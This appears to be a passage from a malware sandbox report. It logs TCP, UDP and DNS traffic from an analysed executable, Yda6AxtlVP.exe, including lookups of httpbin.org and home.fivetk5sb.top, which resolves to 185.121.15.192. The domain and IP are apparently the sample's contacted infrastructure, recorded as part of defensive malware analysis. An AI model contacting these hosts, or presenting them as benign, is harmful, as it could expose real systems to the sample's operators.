                                                  Dec 23, 2024 06:54:59.503036022 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.503065109 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.503086090 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.503107071 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.548336983 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.548466921 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.664284945 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.664407969 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:54:59.712250948 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.824284077 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:54:59.824332952 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.024271965 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.024349928 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.247081995 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.247437000 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.247529984 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367094994 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367126942 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367139101 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367147923 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367187977 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367211103 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367265940 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367288113 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367305040 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367348909 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367358923 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367413998 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367418051 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367430925 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367465973 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367480993 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367515087 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367573977 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367619991 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367670059 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.367675066 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367686033 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367743969 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367784023 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367835045 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367896080 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367939949 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.367955923 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368032932 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368074894 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368154049 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368170023 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368247986 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368319988 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368330956 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.368760109 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.416438103 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.416565895 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.487021923 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487061977 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487107038 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487122059 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.487150908 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.487168074 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487205982 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487271070 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.487309933 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487328053 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487437963 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487509012 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487581015 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487632990 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487668037 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487725973 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487807989 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487826109 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487960100 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.487970114 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488261938 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488342047 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488360882 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488396883 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488429070 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488435984 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488440990 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488485098 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488487005 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488497972 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488532066 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488548040 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488549948 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488591909 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488595009 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488651037 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488656998 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488676071 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488704920 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488719940 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488749027 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488761902 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488778114 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488796949 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488801956 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488820076 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.488823891 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488863945 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488892078 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488955021 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.488975048 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489048004 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489058018 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489074945 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489181042 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489197016 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489207029 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489294052 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489312887 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489444971 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489454031 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489496946 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489526033 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489640951 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489655018 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489746094 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489758015 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489875078 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.489908934 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.490086079 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.490187883 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.490197897 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.490217924 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.490231991 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.536094904 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.606836081 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.606848955 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.606904984 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.606914997 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607017040 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607027054 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607034922 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607044935 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607147932 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607476950 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.607552052 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.607687950 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607839108 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607889891 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607920885 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607930899 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.607991934 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608002901 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608062983 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608123064 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608131886 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608144999 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608155012 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608272076 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608325958 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608431101 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608485937 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608546972 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608594894 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608690023 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608700037 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608743906 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608753920 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608791113 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608808041 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608861923 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608871937 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608913898 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.608959913 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609003067 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609061956 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609071970 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609102964 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609112978 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609167099 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609175920 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609215021 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609225035 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609255075 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609296083 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609349966 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609359980 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609401941 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609456062 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609464884 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609505892 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609515905 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609532118 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609668970 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609685898 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609783888 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609800100 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609888077 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.609898090 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.619169950 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.619539976 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:00.727291107 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727319002 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727406979 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727422953 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727561951 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727617025 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727711916 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727721930 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727792978 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727874994 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727884054 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727894068 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727931023 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.727941036 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728064060 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728104115 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728178024 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728243113 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728254080 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728323936 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728334904 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728415966 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728425026 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728523016 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728538990 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728576899 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728666067 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728764057 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728815079 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728853941 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728889942 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728940964 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.728950977 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729001999 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729018927 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729070902 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729139090 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729302883 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729320049 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729371071 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729419947 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729461908 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729552031 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729561090 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729710102 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729720116 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729727983 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729737043 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729747057 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729825020 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729834080 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729841948 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729852915 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.729903936 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739208937 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739284992 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739372015 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739382029 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739527941 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739537954 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739546061 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739557981 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739567995 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739578009 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739639044 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739653111 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739661932 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739670992 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739758968 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739769936 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739833117 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739842892 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739979029 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.739988089 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740061998 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740080118 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740180969 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740240097 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740326881 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740381002 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740467072 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740480900 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740518093 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740571976 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740664959 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740675926 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740765095 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740776062 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740916014 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.740947962 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.741065025 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.741075039 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.741144896 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.741154909 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:00.741261005 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:01.577084064 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:01.577217102 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:01.577275038 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:01.577617884 CET4971680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:01.697012901 CET8049716185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:02.806998014 CET4972680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:02.926516056 CET8049726185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:02.926619053 CET4972680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:02.927181959 CET4972680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:03.046679974 CET8049726185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:04.951663017 CET8049726185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:04.951848984 CET8049726185.121.15.192192.168.2.10
                                                  Dec 23, 2024 06:55:04.951909065 CET4972680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:04.952353954 CET4972680192.168.2.10185.121.15.192
                                                  Dec 23, 2024 06:55:05.071751118 CET8049726185.121.15.192192.168.2.10

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 23, 2024 06:54:55.002644062 CET5010653192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:54:55.002762079 CET5010653192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:54:55.140141010 CET53501061.1.1.1192.168.2.10
                                                  Dec 23, 2024 06:54:55.140896082 CET53501061.1.1.1192.168.2.10
                                                  Dec 23, 2024 06:54:58.396060944 CET5010953192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:54:58.396116018 CET5010953192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:54:59.140737057 CET53501091.1.1.1192.168.2.10
                                                  Dec 23, 2024 06:54:59.141196966 CET53501091.1.1.1192.168.2.10
                                                  Dec 23, 2024 06:55:02.656680107 CET5011153192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:55:02.656740904 CET5011153192.168.2.101.1.1.1
                                                  Dec 23, 2024 06:55:02.805653095 CET53501111.1.1.1192.168.2.10
                                                  Dec 23, 2024 06:55:02.806159019 CET53501111.1.1.1192.168.2.10

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 23, 2024 06:54:55.002644062 CET192.168.2.101.1.1.10x6228Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:54:55.002762079 CET192.168.2.101.1.1.10xbaStandard query (0)httpbin.org28IN (0x0001)false
                                                  Dec 23, 2024 06:54:58.396060944 CET192.168.2.101.1.1.10x52b9Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:54:58.396116018 CET192.168.2.101.1.1.10xf0cfStandard query (0)home.fivetk5sb.top28IN (0x0001)false
                                                  Dec 23, 2024 06:55:02.656680107 CET192.168.2.101.1.1.10xa3a3Standard query (0)home.fivetk5sb.topA (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:55:02.656740904 CET192.168.2.101.1.1.10x7b55Standard query (0)home.fivetk5sb.top28IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 23, 2024 06:54:55.140141010 CET1.1.1.1192.168.2.100x6228No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:54:55.140141010 CET1.1.1.1192.168.2.100x6228No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:54:59.141196966 CET1.1.1.1192.168.2.100x52b9No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 06:55:02.805653095 CET1.1.1.1192.168.2.100xa3a3No error (0)home.fivetk5sb.top185.121.15.192A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • httpbin.org
                                                  • home.fivetk5sb.top

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.1049716185.121.15.192807820C:\Users\user\Desktop\Yda6AxtlVP.exe
